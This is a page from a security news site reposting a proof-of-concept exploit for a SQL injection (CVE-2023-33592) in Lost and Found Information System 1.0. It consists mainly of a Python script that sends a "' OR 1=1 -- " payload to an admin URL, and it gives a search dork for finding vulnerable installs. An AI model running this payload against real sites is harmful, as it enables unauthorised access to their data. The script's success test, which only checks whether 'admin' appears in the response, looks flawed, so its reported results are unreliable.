Home Tools Exploits & CVE's Lost And Found Information System 1.0 SQL Injection

Lost And Found Information System 1.0 SQL Injection

July 11, 2023

320

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

advisories | CVE-2023-33592

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")

Lost And Found Information System 1.0 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Poland says it was targeted by Russian military intelligence hackers

Catholic health system Ascension warns of disruptions following cyberattack

Former NSA head Paul Nakasone to helm national security institute at...

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

PHP 8.1.0-dev Backdoor Remote Command Execution

Scriptio 1.4 Cross Site Scripting

Hikvision Hybrid SAN Ds-a71024 SQL Injection